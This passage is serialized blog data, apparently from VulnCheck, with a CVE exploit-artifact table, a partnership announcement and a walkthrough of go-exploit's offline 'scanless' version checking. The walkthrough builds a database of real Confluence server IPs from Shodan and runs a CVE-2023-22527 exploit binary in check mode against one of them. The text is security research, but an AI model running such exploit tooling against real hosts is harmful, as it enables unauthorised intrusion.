Execution",[341,68962,68940],{},[341,68964,40178],{},[341,68966,59510],{},[341,68968],{},[341,68970,59510],{},[341,68972,59510],{},[341,68974,59510],{},[341,68976,59510],{},[313,68978,68979,68982,68985,68988,68990,68992,68994,68996,68998],{},[341,68980,68981],{},"Progress WhatsUp Gold Path Traversal",[341,68983,68984],{},"2024-07-12",[341,68986,68987],{},"CVE-2024-4885",[341,68989,59510],{},[341,68991],{},[341,68993,59510],{},[341,68995,59510],{},[341,68997,59510],{},[341,68999,59510],{},[313,69001,69002,69005,69007,69010,69012,69014,69016,69018,69020],{},[341,69003,69004],{},"Zyxel CPE Diag Command Injection",[341,69006,68984],{},[341,69008,69009],{},"CVE-2024-40890",[341,69011,59510],{},[341,69013,59510],{},[341,69015,59510],{},[341,69017,59510],{},[341,69019,59510],{},[341,69021],{},[313,69023,69024,69027,69029,69031,69033,69035,69037,69039,69041],{},[341,69025,69026],{},"Zyxel CPE Telnet Command Injection",[341,69028,68984],{},[341,69030,55362],{},[341,69032,59510],{},[341,69034,59510],{},[341,69036,59510],{},[341,69038,59510],{},[341,69040,59510],{},[341,69042],{},[313,69044,69045,69048,69051,69054,69056,69058,69060,69062,69064],{},[341,69046,69047],{},"Apache CloudStack Unsecured cluster API remote code execution",[341,69049,69050],{},"2024-07-15",[341,69052,69053],{},"CVE-2024-38346",[341,69055,59510],{},[341,69057,59510],{},[341,69059,59510],{},[341,69061,59510],{},[341,69063,59510],{},[341,69065,59510],{},[313,69067,69068,69071,69074,69077,69079,69081,69083,69085,69087],{},[341,69069,69070],{},"Laravel Credential leak in log files",[341,69072,69073],{},"2024-07-17",[341,69075,69076],{},"CVE-2024-29291",[341,69078,59510],{},[341,69080],{},[341,69082,59510],{},[341,69084,59510],{},[341,69086,59510],{},[341,69088,59510],{},[313,69090,69091,69094,69097,69100,69102,69104,69106,69108,69110],{},[341,69092,69093],{},"Zyxel Auth Bypass and pkg_init_cmd Command Injection",[341,69095,69096],{},"2024-07-19",[341,69098,69099],{},"CVE-2023-4473",[341,69101,59510],{},[341,69103,59510],{},[341,69105,59510],{},[341,69107,59510],{},[341,69109,59510],{},[341,69111],{},[313,69113,69114,69117,69120,69123,69125,69127,69129,69131,69133],{},[341,69115,69116],{},"Magento XXE Information Disclosure",[341,69118,69119],{},"2024-07-21",[341,69121,69122],{},"CVE-2024-34102",[341,69124,59510],{},[341,69126,59510],{},[341,69128,59510],{},[341,69130,59510],{},[341,69132,59510],{},[341,69134,59510],{},[313,69136,69137,69140,69143,69146,69148,69150,69152,69154,69156],{},[341,69138,69139],{},"H3C ERHMG2 Configuration\u002FPassword Leak",[341,69141,69142],{},"2024-07-22",[341,69144,69145],{},"CVE-2024-32238",[341,69147,59510],{},[341,69149],{},[341,69151,59510],{},[341,69153,59510],{},[341,69155,59510],{},[341,69157],{},[313,69159,69160,69163,69166,69169,69171,69173,69175,69177,69179],{},[341,69161,69162],{},"Elementor Essential Addons WordPress Plugin Authentication Bypass Remote Code Execution",[341,69164,69165],{},"2024-07-25",[341,69167,69168],{},"CVE-2023-32243",[341,69170,59510],{},[341,69172,59510],{},[341,69174,59510],{},[341,69176,59510],{},[341,69178,59510],{},[341,69180],{},[313,69182,69183,69186,69189,69192,69194,69196,69198,69200,69202],{},[341,69184,69185],{},"Ghostscript Filesystem Format String RCE",[341,69187,69188],{},"2024-07-30",[341,69190,69191],{},"CVE-2024-29510",[341,69193,59510],{},[341,69195],{},[341,69197],{},[341,69199],{},[341,69201],{},[341,69203,59510],{},[313,69205,69206,69209,69212,69215,69217,69219,69221,69223,69225],{},[341,69207,69208],{},"AJ-Report unauthenticated path-traversal Java evaluation RCE",[341,69210,69211],{},"2024-07-31",[341,69213,69214],{},"CVE-2024-7314",[341,69216,59510],{},[341,69218,59510],{},[341,69220,59510],{},[341,69222,59510],{},[341,69224,59510],{},[341,69226],{},[61,69228,59851],{"id":59850},[18,69230,59854,69231],{},[47,69232,59857],{"href":59857,"rel":69233},[51],{"title":219,"searchDepth":220,"depth":220,"links":69235},[69236,69237],{"id":68882,"depth":220,"text":68883},{"id":59850,"depth":220,"text":59851},"2024-08-01","In July 2024, we developed new Initial Access Intelligence (IAI) artifacts for 14 CVEs, covering 13 different vendors and 10 different products.",{"slug":69241},"initial-access-intelligence-july-2024","\u002Fblog\u002Finitial-access-intelligence-july-2024",{"title":68839,"description":69239},"blog\u002Finitial-access-intelligence-july-2024",[1281],"pSs_VvT1WdV2vLF9lW9UzvAUNAP8M8-mLxySPhZd2_A",{"id":69248,"title":69249,"articles":69250,"authors":69255,"body":69257,"date":69238,"description":69344,"extension":234,"image":7,"link":7,"meta":69345,"navigation":237,"path":69347,"seo":69348,"series":7,"stem":69349,"subtype":7,"tags":7,"__hash__":69350},"blog\u002Fblog\u002Fvulncheck-sevco.md","VulnCheck and Sevco - Real-time Threat Visibility and the Most Comprehensive Asset Intelligence",[69251],{"title":69252,"source":69253,"link":69254,"date":69238},"Sevco and VulnCheck Partner to Provide Customers a Powerful Combination of Real-time Threat Visibility and the Most Comprehensive Asset Intelligence","Business Wire","https:\u002F\u002Fwww.businesswire.com\u002Fnews\u002Fhome\u002F20240731216844\u002Fen\u002FSevco-and-VulnCheck-Partner-to-Provide-Customers-a-Powerful-Combination-of-Real-time-Threat-Visibility-and-the-Most-Comprehensive-Asset-Intelligence",[69256],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":69258,"toc":69342},[69259,69267,69270,69273,69279,69282,69285,69288,69299,69306,69309,69317,69320,69327,69330,69333],[18,69260,69261,69262,69266],{},"Today marks a very interesting day for VulnCheck - we are announcing our partnership with ",[47,69263,64381],{"href":69264,"rel":69265},"https:\u002F\u002Fsevcosecurity.com\u002F",[51],", provider of the industry’s most accurate real-time asset intelligence platform.",[18,69268,69269],{},"Sevco is a market leader. Through this collaboration, Sevco has integrated VulnCheck data to roll out a significant set of enhancements to its existing vulnerability prioritization and exposure management capabilities. The integration of VulnCheck’s exploit and vulnerability intelligence with the Sevco platform offers organizations the most comprehensive visibility into their attack surface and software assets, empowering teams to quickly remediate potential vulnerabilities.",[18,69271,69272],{},"What’s New\nSevco gives teams comprehensive visibility into an organization’s attack surface and the assets in its IT environment. Their platform consolidates CVEs from the many sources that report them and uncovers environmental vulnerabilities to improve the efficacy of vulnerability management programs.",[18,69274,69275],{},[68,69276],{":width":10862,"alt":69277,"src":69278},"VulnCheck Sevco Product","\u002Fblog\u002Fvulncheck-sevco\u002Fvulncheck-sevco.png",[18,69280,69281],{},"This partnership and integration enables Sevco to enrich CVEs with VulnCheck data, providing teams with a complete view of vulnerabilities and their potential for weaponization or exploitation in the wild. Through enhancements to the Sevco Unified Vulnerability Dashboard, security teams now have real-time, deep contextual understanding of their vulnerability risks.",[18,69283,69284],{},"This is a big deal because Sevco is the first mover to leverage VulnCheck’s intelligence in the asset management segment of cybersecurity.",[18,69286,69287],{},"What are the core benefits customers can expect from this partnership?\nThe Sevco-VulnCheck partnership enables organizations to accelerate the maturity of their vulnerability management programs by providing the following foundational elements:",[22,69289,69290,69293,69296],{},[25,69291,69292],{},"Complete Asset Inventory – Sevco’s security asset inventory automatically provides security teams a complete and accurate view of devices – and the agents used to manage them – that is essential for understanding where vulnerabilities could be hiding.",[25,69294,69295],{},"Vulnerability Consolidation & Prioritization – Sevco consolidates vulnerabilities from any source that reports them into one platform, and VulnCheck provides the exploitation intelligence vulnerability management programs can use to triage and prioritize vulnerabilities.",[25,69297,69298],{},"Remediation, Validation and Reporting -- Sevco provides extensible asset data to combine business-related context with the vulnerability and exploit intelligence from VulnCheck to determine, act, and report on the risk specific to each organization.",[43656,69300,69303],{"author":69301,"position":69302},"Anthony Bettini","Founder and CEO",[18,69304,69305],{},"Enterprise systems have evolved to the point where security teams demand the fastest threat data to defeat adversaries and reduce risk. At the same time, effective vulnerability management requires a comprehensive and accurate asset inventory that is updated in real time. The combination of Sevco and VulnCheck enables enterprises to continuously discover and analyze across all assets to identify vulnerable conditions before an attacker can exploit them.",[18,69307,69308],{},"What’s truly unique about Sevco adding VulnCheck intelligence to its platform is that Sevco’s confidence in VulnCheck’s data was realized because other intelligence sources only cover a fraction of vulnerabilities in the wild, and lack critical information such as CVSS scores or Known Exploited Vulnerabilities (KEVs).",[18,69310,69311,69312,69316],{},"In just two sources as part of a larger collection of vulnerability intelligence sources, which are available to anyone in ",[47,69313,69315],{"href":40745,"rel":69314},[51],"VulnCheck’s Community Tier",", VulnCheck covers over 80% more exploited vulnerabilities in the wild than the CISA KEV, and on average notifies users 27 days earlier than CISA and 14 days faster than NIST NVD.",[18,69318,69319],{},"VulnCheck maintains over 300 million unique data points from 420+ sources on ALL CVE’s, making it the only game in town for product builders to autonomously enrich the aggregated and deduplicated vulnerabilities like they do in the Sevco platform. So this is a big deal because now VulnCheck is paired with asset data, and understanding where software packages are vulnerable when there are likely apps that many organizations are blind to - is well, huge!",[43656,69321,69324],{"author":69322,"position":69323},"J.J. Guy","Co-Founder and CEO",[18,69325,69326],{},"With the exploitation of vulnerabilities increasing 180% over the past year, organizations must mature their vulnerability management programs as a strategic priority. Our partnership with VulnCheck enables us to significantly build on the vulnerability hunting capabilities in the Sevco platform by adding the most complete exploit intelligence on the market. The combination gives security teams the only real-time threat visibility for software assets, enabling them to act faster and smarter in remediating vulnerabilities.",[18,69328,69329],{},"We are thrilled to reconnect with some old friends at Sevco who have put together a great offering and a great organization. Its also been great to work with the Sevco team, and make some new friends along the way!!",[18,69331,69332],{},"If you’re interested in learning more about the integration, we’ll be teaming up with Sevco to demonstrate the new capabilities at Black Hat USA next week. Stop by Startup City stand 220 to see how these enhancements can benefit you’re organization.",[18,69334,69335,69336,69341],{},"Plus, Sevco is a sponsor of VulnCheck’s Security Wasteland 2024. ",[47,69337,69340],{"href":69338,"rel":69339},"https:\u002F\u002Fwwv.vulncheck.com\u002Fsecurity-wasteland-black-hat-2024?utm_source=vulncheck",[51],"You should register"," if you haven’t!!! Let’s go!",{"title":219,"searchDepth":220,"depth":220,"links":69343},[],"Sevco is a market leader. Through this collaboration, Sevco has integrated VulnCheck data to roll out a significant set of enhancements to its existing vulnerability prioritization and exposure management capabilities.",{"slug":69346},"vulncheck-sevco","\u002Fblog\u002Fvulncheck-sevco",{"title":69249,"description":69344},"blog\u002Fvulncheck-sevco","IT4GiM90FkMKWdhvEeBT8IYRwrPULgGVO-pezCwTKJY",{"id":69352,"title":69353,"articles":7,"authors":69354,"body":69356,"date":69165,"description":71595,"extension":234,"image":7,"link":7,"meta":71596,"navigation":237,"path":68852,"seo":71598,"series":7,"stem":71599,"subtype":7,"tags":71600,"__hash__":71601},"blog\u002Fblog\u002Fvulncheck-goes-scanless.md","VulnCheck go-exploit Goes Scanless",[69355],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":69357,"toc":71588},[69358,69364,69372,69386,69392,69406,69410,69424,69525,69532,69734,69738,69750,69754,69761,70065,70071,70165,70169,70182,70249,70252,70322,70325,70638,70641,70645,70648,70656,70663,71028,71031,71101,71104,71202,71205,71574,71585],[18,69359,69360,69363],{},[47,69361,20558],{"href":14297,"rel":69362},[51]," is VulnCheck’s open-source exploit development framework. Besides exploitation and c2 primitives, the framework features built-in asset detection and version scanning capabilities. A recent update to go-exploit allows for the exploits to share information across runs. This makes go-exploit the only exploit framework to scan HTTP targets without ever connecting to them!",[18,69365,69366,69367,69371],{},"The security industry puts a lot of effort into internet scanning. Our friends over at GreyNoise track almost ",[47,69368,48221],{"href":69369,"rel":69370},"https:\u002F\u002Fviz.greynoise.io\u002Ftags",[51]," different industry “actors” that scan the internet. There are countless others that stand up their own Tenable, Nuclei, Metasploit, etc. and scan, without attribution, from Amazon, Digital Ocean, and more. go-exploit was always intended to fall within this mass-scanning category too.",[18,69373,69374,69375,69379,69380,69385],{},"But now, go-exploit, using the exact same code for active scanning, supports scanless asset detection and version scanning. To see how that works, let’s find all the internet-facing Atlassian Confluence servers vulnerable to ",[47,69376,22217],{"href":69377,"rel":69378},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-22527",[51],". To start, let’s say we agree on this ",[47,69381,69384],{"href":69382,"rel":69383},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",[51],"Shodan query"," for Confluence.",[18,69387,69388],{},[68,69389],{":width":10862,"alt":69390,"src":69391},"Confluence on Shodan","\u002Fblog\u002Fvulncheck-goes-scanless\u002Fshodan-confluence.png",[18,69393,69394,69395,69400,69401,69405],{},"How can we quickly determine which servers in the query are vulnerable? Tenable Nessus has a ",[47,69396,69399],{"href":69397,"rel":69398},"https:\u002F\u002Fwww.tenable.com\u002Fplugins\u002Fnessus\u002F188068",[51],"version scanner"," for this CVE, but the thought of configuring Nessus and scanning thousands of hosts is about as appealing as lying in a coffin full of scorpions. Nuclei has a ",[47,69402,30296],{"href":69403,"rel":69404},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002F37cb7a57f8521350b96a4accfcb87513dbb1ff1b\u002Fhttp\u002Fcves\u002F2023\u002FCVE-2023-22527.yaml",[51],"! But running it against internet-hosts is bordering on a criminal act. Scanless go-exploit sounds downright pleasant compared to those two.",[61,69407,69409],{"id":69408},"step-1-convert-a-shodan-query-into-a-database","Step 1: Convert a Shodan Query into a Database",[18,69411,69412,69413,69418,69419,69423],{},"Our first step is to convert the Shodan query into something go-exploit can understand. ",[47,69414,69417],{"href":69415,"rel":69416},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit-cache",[51],"go-exploit-cache"," can convert a Shodan gzip file into a go-exploit database. All we have to do is download the data from Shodan and pass it to go-exploit-cache. We’ve provided a sample of that data ",[47,69420,305],{"href":69421,"rel":69422},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit-cache\u002Fblob\u002Fmain\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz",[51],", and you can use it with go-exploit-cache like so:",[1354,69425,69427],{"className":31740,"code":69426,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ .\u002Fbuild\u002Fgo-exploit-cache -type shodan-gzip -in .\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz -out confluence.db\n2024\u002F07\u002F19 14:37:36 Decompressing the Shodan GZIP... this can be slow\n2024\u002F07\u002F19 14:37:37 Decompressed file written to .tmp\u002Fshodan.json\n2024\u002F07\u002F19 14:37:37 Generating database entries...\nalbinolobster@mournland:~\u002Fgo-exploit-cache$\n",[886,69428,69429,69455,69485,69505,69520],{"__ignoreMap":219},[1373,69430,69431,69434,69437,69440,69443,69446,69449,69452],{"class":1375,"line":1376},[1373,69432,69433],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit-cache$",[1373,69435,69436],{"class":1391}," .\u002Fbuild\u002Fgo-exploit-cache",[1373,69438,69439],{"class":2209}," -type",[1373,69441,69442],{"class":1391}," shodan-gzip",[1373,69444,69445],{"class":2209}," -in",[1373,69447,69448],{"class":1391}," .\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz",[1373,69450,69451],{"class":2209}," -out",[1373,69453,69454],{"class":1391}," confluence.db\n",[1373,69456,69457,69460,69463,69466,69468,69471,69474,69477,69479,69482],{"class":1375,"line":220},[1373,69458,69459],{"class":2206},"2024\u002F07\u002F19",[1373,69461,69462],{"class":1391}," 14:37:36",[1373,69464,69465],{"class":1391}," Decompressing",[1373,69467,57354],{"class":1391},[1373,69469,69470],{"class":1391}," Shodan",[1373,69472,69473],{"class":1391}," GZIP...",[1373,69475,69476],{"class":1391}," this",[1373,69478,39106],{"class":1391},[1373,69480,69481],{"class":1391}," be",[1373,69483,69484],{"class":1391}," slow\n",[1373,69486,69487,69489,69492,69495,69497,69500,69502],{"class":1375,"line":1266},[1373,69488,69459],{"class":2206},[1373,69490,69491],{"class":1391}," 14:37:37",[1373,69493,69494],{"class":1391}," Decompressed",[1373,69496,8738],{"class":1391},[1373,69498,69499],{"class":1391}," written",[1373,69501,55503],{"class":1391},[1373,69503,69504],{"class":1391}," .tmp\u002Fshodan.json\n",[1373,69506,69507,69509,69511,69514,69517],{"class":1375,"line":1852},[1373,69508,69459],{"class":2206},[1373,69510,69491],{"class":1391},[1373,69512,69513],{"class":1391}," Generating",[1373,69515,69516],{"class":1391}," database",[1373,69518,69519],{"class":1391}," entries...\n",[1373,69521,69522],{"class":1375,"line":4692},[1373,69523,69524],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit-cache$\n",[18,69526,69527,69528,69531],{},"go-exploit-cache produces an sqlite database that is consumable by go-exploit. If you open up the database, you can find the cached HTTP responses in the ",[886,69529,69530],{},"http_cache"," table:",[1354,69533,69535],{"className":31740,"code":69534,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select rhost,rport from http_cache limit 10;\n52.207.194.59|80\n52.200.210.54|80\n135.181.36.116|443\n122.152.230.161|8090\n31.148.148.9|443\n65.203.128.117|8443\n85.184.249.239|443\n129.241.14.197|443\n158.160.120.182|443\n52.34.139.174|443\nsqlite> select count(*) from http_cache;\n2313\nsqlite>\n",[886,69536,69537,69546,69562,69581,69606,69616,69625,69635,69645,69654,69664,69673,69682,69691,69700,69723,69728],{"__ignoreMap":219},[1373,69538,69539,69541,69544],{"class":1375,"line":1376},[1373,69540,69433],{"class":2206},[1373,69542,69543],{"class":1391}," sqlite3",[1373,69545,69454],{"class":1391},[1373,69547,69548,69551,69553,69556,69559],{"class":1375,"line":220},[1373,69549,69550],{"class":2206},"SQLite",[1373,69552,45880],{"class":1391},[1373,69554,69555],{"class":5467}," 3.31.1",[1373,69557,69558],{"class":1391}," 2020-01-27",[1373,69560,69561],{"class":1391}," 19:55:54\n",[1373,69563,69564,69566,69568,69571,69573,69575,69578],{"class":1375,"line":1266},[1373,69565,55798],{"class":2206},[1373,69567,4883],{"class":1387},[1373,69569,69570],{"class":1391},".help",[1373,69572,183],{"class":1387},[1373,69574,55807],{"class":1391},[1373,69576,69577],{"class":1391}," usage",[1373,69579,69580],{"class":1391}," hints.\n",[1373,69582,69583,69586,69589,69591,69594,69596,69599,69602,69604],{"class":1375,"line":1852},[1373,69584,69585],{"class":2206},"sqlite",[1373,69587,69588],{"class":4640},"> ",[1373,69590,49878],{"class":1391},[1373,69592,69593],{"class":1391}," rhost,rport",[1373,69595,67067],{"class":1391},[1373,69597,69598],{"class":1391}," http_cache",[1373,69600,69601],{"class":1391}," limit",[1373,69603,39673],{"class":5467},[1373,69605,4912],{"class":1383},[1373,69607,69608,69611,69613],{"class":1375,"line":4692},[1373,69609,69610],{"class":2206},"52.207.194.59",[1373,69612,17472],{"class":1397},[1373,69614,69615],{"class":2206},"80\n",[1373,69617,69618,69621,69623],{"class":1375,"line":4724},[1373,69619,69620],{"class":2206},"52.200.210.54",[1373,69622,17472],{"class":1397},[1373,69624,69615],{"class":2206},[1373,69626,69627,69630,69632],{"class":1375,"line":4756},[1373,69628,69629],{"class":2206},"135.181.36.116",[1373,69631,17472],{"class":1397},[1373,69633,69634],{"class":2206},"443\n",[1373,69636,69637,69640,69642],{"class":1375,"line":4768},[1373,69638,69639],{"class":2206},"122.152.230.161",[1373,69641,17472],{"class":1397},[1373,69643,69644],{"class":2206},"8090\n",[1373,69646,69647,69650,69652],{"class":1375,"line":4792},[1373,69648,69649],{"class":2206},"31.148.148.9",[1373,69651,17472],{"class":1397},[1373,69653,69634],{"class":2206},[1373,69655,69656,69659,69661],{"class":1375,"line":4798},[1373,69657,69658],{"class":2206},"65.203.128.117",[1373,69660,17472],{"class":1397},[1373,69662,69663],{"class":2206},"8443\n",[1373,69665,69666,69669,69671],{"class":1375,"line":4806},[1373,69667,69668],{"class":2206},"85.184.249.239",[1373,69670,17472],{"class":1397},[1373,69672,69634],{"class":2206},[1373,69674,69675,69678,69680],{"class":1375,"line":4817},[1373,69676,69677],{"class":2206},"129.241.14.197",[1373,69679,17472],{"class":1397},[1373,69681,69634],{"class":2206},[1373,69683,69684,69687,69689],{"class":1375,"line":4825},[1373,69685,69686],{"class":2206},"158.160.120.182",[1373,69688,17472],{"class":1397},[1373,69690,69634],{"class":2206},[1373,69692,69693,69696,69698],{"class":1375,"line":4835},[1373,69694,69695],{"class":2206},"52.34.139.174",[1373,69697,17472],{"class":1397},[1373,69699,69634],{"class":2206},[1373,69701,69702,69704,69706,69708,69711,69713,69715,69717,69719,69721],{"class":1375,"line":4843},[1373,69703,69585],{"class":2206},[1373,69705,69588],{"class":4640},[1373,69707,49878],{"class":1391},[1373,69709,69710],{"class":1391}," count",[1373,69712,1384],{"class":1383},[1373,69714,35613],{"class":1397},[1373,69716,2230],{"class":1383},[1373,69718,67067],{"class":1391},[1373,69720,69598],{"class":1391},[1373,69722,4912],{"class":1383},[1373,69724,69725],{"class":1375,"line":4849},[1373,69726,69727],{"class":2206},"2313\n",[1373,69729,69730,69732],{"class":1375,"line":4877},[1373,69731,69585],{"class":2206},[1373,69733,6765],{"class":4640},[61,69735,69737],{"id":69736},"step-2-grab-a-go-exploit-scanner","Step 2: Grab a go-exploit Scanner",[18,69739,69740,69741,10515,69744,69749],{},"Now that we’ve converted the Shodan Confluence query into a database, we need a go-exploit scanner. Fortunately, VulnCheck ",[47,69742,22232],{"href":53842,"rel":69743},[51],[47,69745,69748],{"href":69746,"rel":69747},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527",[51],"three exploits"," for CVE-2023-22527 on GitHub back in March, all of which have asset detection and version scanning built in. We can grab any of them and run a scanless version check using the generated database.",[61,69751,69753],{"id":69752},"step-3-run-go-exploit-against-your-target-hosts","Step 3: Run go-exploit against your target hosts",[18,69755,69756,69757,69760],{},"In the following, we use the first entry listed in the database above (52.207.194.59:80) and use ",[886,69758,69759],{},"unshare -n"," to demonstrate that go-exploit doesn’t require network access.",[1354,69762,69764],{"className":31740,"code":69763,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ sudo unshare -n .\u002Fbuild\u002Fcve-2023-22527_linux-arm64 -c -v -rhost 52.207.194.59 -rport 80 -db ~\u002Fgo-exploit-cache\u002Fconfluence.db\ntime=2024-07-19T15:06:11.519-04:00 level=STATUS msg=\"Starting target\" index=0 host=52.207.194.59 port=80 ssl=false \"ssl auto\"=false\ntime=2024-07-19T15:06:11.519-04:00 level=STATUS msg=\"Validating Confluence target\" host=52.207.194.59 port=80\ntime=2024-07-19T15:06:11.531-04:00 level=SUCCESS msg=\"Target verification succeeded!\" host=52.207.194.59 port=80 verified=true\ntime=2024-07-19T15:06:11.531-04:00 level=STATUS msg=\"Running a version check on the remote target\" host=52.207.194.59 port=80\ntime=2024-07-19T15:06:11.532-04:00 level=VERSION msg=\"The reported version is 7.19.17\" host=52.207.194.59 port=80 version=7.19.17\ntime=2024-07-19T15:06:11.542-04:00 level=STATUS msg=\"The target appears to be a patched version.\" host=52.207.194.59 port=80 vulnerable=no\n",[886,69765,69766,69802,69859,69896,69939,69975,70020],{"__ignoreMap":219},[1373,69767,69768,69771,69773,69776,69779,69782,69784,69786,69788,69791,69793,69796,69799],{"class":1375,"line":1376},[1373,69769,69770],{"class":2206},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$",[1373,69772,17747],{"class":1391},[1373,69774,69775],{"class":1391}," unshare",[1373,69777,69778],{"class":2209}," -n",[1373,69780,69781],{"class":1391}," .\u002Fbuild\u002Fcve-2023-22527_linux-arm64",[1373,69783,45587],{"class":2209},[1373,69785,45584],{"class":2209},[1373,69787,38910],{"class":2209},[1373,69789,69790],{"class":5467}," 52.207.194.59",[1373,69792,45568],{"class":2209},[1373,69794,69795],{"class":5467}," 80",[1373,69797,69798],{"class":2209}," -db",[1373,69800,69801],{"class":1391}," ~\u002Fgo-exploit-cache\u002Fconfluence.db\n",[1373,69803,69804,69806,69808,69811,69813,69815,69817,69819,69821,69823,69825,69827,69829,69831,69833,69835,69837,69839,69841,69843,69845,69847,69849,69851,69853,69855,69857],{"class":1375,"line":220},[1373,69805,38930],{"class":4640},[1373,69807,5417],{"class":1397},[1373,69809,69810],{"class":1391},"2024-07-19T15:06:11.519-04:00",[1373,69812,38938],{"class":4640},[1373,69814,5417],{"class":1397},[1373,69816,38943],{"class":1391},[1373,69818,38946],{"class":4640},[1373,69820,5417],{"class":1397},[1373,69822,183],{"class":1387},[1373,69824,38979],{"class":1391},[1373,69826,183],{"class":1387},[1373,69828,38984],{"class":4640},[1373,69830,5417],{"class":1397},[1373,69832,445],{"class":1391},[1373,69834,38991],{"class":4640},[1373,69836,5417],{"class":1397},[1373,69838,69610],{"class":1391},[1373,69840,38999],{"class":4640},[1373,69842,5417],{"class":1397},[1373,69844,39004],{"class":1391},[1373,69846,39007],{"class":4640},[1373,69848,5417],{"class":1397},[1373,69850,5971],{"class":1391},[1373,69852,4883],{"class":1387},[1373,69854,39016],{"class":1391},[1373,69856,183],{"class":1387},[1373,69858,39021],{"class":1391},[1373,69860,69861,69863,69865,69867,69869,69871,69873,69875,69877,69879,69882,69884,69886,69888,69890,69892,69894],{"class":1375,"line":1266},[1373,69862,38930],{"class":4640},[1373,69864,5417],{"class":1397},[1373,69866,69810],{"class":1391},[1373,69868,38938],{"class":4640},[1373,69870,5417],{"class":1397},[1373,69872,38943],{"class":1391},[1373,69874,38946],{"class":4640},[1373,69876,5417],{"class":1397},[1373,69878,183],{"class":1387},[1373,69880,69881],{"class":1391},"Validating Confluence target",[1373,69883,183],{"class":1387},[1373,69885,38991],{"class":4640},[1373,69887,5417],{"class":1397},[1373,69889,69610],{"class":1391},[1373,69891,38999],{"class":4640},[1373,69893,5417],{"class":1397},[1373,69895,69615],{"class":1391},[1373,69897,69898,69900,69902,69905,69907,69909,69911,69913,69915,69917,69919,69921,69923,69925,69927,69929,69931,69933,69935,69937],{"class":1375,"line":1852},[1373,69899,38930],{"class":4640},[1373,69901,5417],{"class":1397},[1373,69903,69904],{"class":1391},"2024-07-19T15:06:11.531-04:00",[1373,69906,38938],{"class":4640},[1373,69908,5417],{"class":1397},[1373,69910,39062],{"class":1391},[1373,69912,38946],{"class":4640},[1373,69914,5417],{"class":1397},[1373,69916,183],{"class":1387},[1373,69918,45779],{"class":1391},[1373,69920,183],{"class":1387},[1373,69922,38991],{"class":4640},[1373,69924,5417],{"class":1397},[1373,69926,69610],{"class":1391},[1373,69928,38999],{"class":4640},[1373,69930,5417],{"class":1397},[1373,69932,39004],{"class":1391},[1373,69934,45796],{"class":4640},[1373,69936,5417],{"class":1397},[1373,69938,45801],{"class":1391},[1373,69940,69941,69943,69945,69947,69949,69951,69953,69955,69957,69959,69961,69963,69965,69967,69969,69971,69973],{"class":1375,"line":4692},[1373,69942,38930],{"class":4640},[1373,69944,5417],{"class":1397},[1373,69946,69904],{"class":1391},[1373,69948,38938],{"class":4640},[1373,69950,5417],{"class":1397},[1373,69952,38943],{"class":1391},[1373,69954,38946],{"class":4640},[1373,69956,5417],{"class":1397},[1373,69958,183],{"class":1387},[1373,69960,45824],{"class":1391},[1373,69962,183],{"class":1387},[1373,69964,38991],{"class":4640},[1373,69966,5417],{"class":1397},[1373,69968,69610],{"class":1391},[1373,69970,38999],{"class":4640},[1373,69972,5417],{"class":1397},[1373,69974,69615],{"class":1391},[1373,69976,69977,69979,69981,69984,69986,69988,69990,69992,69994,69996,69999,70001,70003,70005,70007,70009,70011,70013,70015,70017],{"class":1375,"line":4724},[1373,69978,38930],{"class":4640},[1373,69980,5417],{"class":1397},[1373,69982,69983],{"class":1391},"2024-07-19T15:06:11.532-04:00",[1373,69985,38938],{"class":4640},[1373,69987,5417],{"class":1397},[1373,69989,45854],{"class":1391},[1373,69991,38946],{"class":4640},[1373,69993,5417],{"class":1397},[1373,69995,183],{"class":1387},[1373,69997,69998],{"class":1391},"The reported version is 7.19.17",[1373,70000,183],{"class":1387},[1373,70002,38991],{"class":4640},[1373,70004,5417],{"class":1397},[1373,70006,69610],{"class":1391},[1373,70008,38999],{"class":4640},[1373,70010,5417],{"class":1397},[1373,70012,39004],{"class":1391},[1373,70014,45880],{"class":4640},[1373,70016,5417],{"class":1397},[1373,70018,70019],{"class":1391},"7.19.17\n",[1373,70021,70022,70024,70026,70029,70031,70033,70035,70037,70039,70041,70044,70046,70048,70050,70052,70054,70056,70058,70060,70062],{"class":1375,"line":4756},[1373,70023,38930],{"class":4640},[1373,70025,5417],{"class":1397},[1373,70027,70028],{"class":1391},"2024-07-19T15:06:11.542-04:00",[1373,70030,38938],{"class":4640},[1373,70032,5417],{"class":1397},[1373,70034,38943],{"class":1391},[1373,70036,38946],{"class":4640},[1373,70038,5417],{"class":1397},[1373,70040,183],{"class":1387},[1373,70042,70043],{"class":1391},"The target appears to be a patched version.",[1373,70045,183],{"class":1387},[1373,70047,38991],{"class":4640},[1373,70049,5417],{"class":1397},[1373,70051,69610],{"class":1391},[1373,70053,38999],{"class":4640},[1373,70055,5417],{"class":1397},[1373,70057,39004],{"class":1391},[1373,70059,45925],{"class":4640},[1373,70061,5417],{"class":1397},[1373,70063,70064],{"class":1391},"no\n",[18,70066,70067,70068,69531],{},"Above you can see the scanner validated the target as Atlassian Confluence, extracted a version number (7.19.17), and determined the host is using an unaffected version. All that without ever connecting to the host! The scanner also updated the 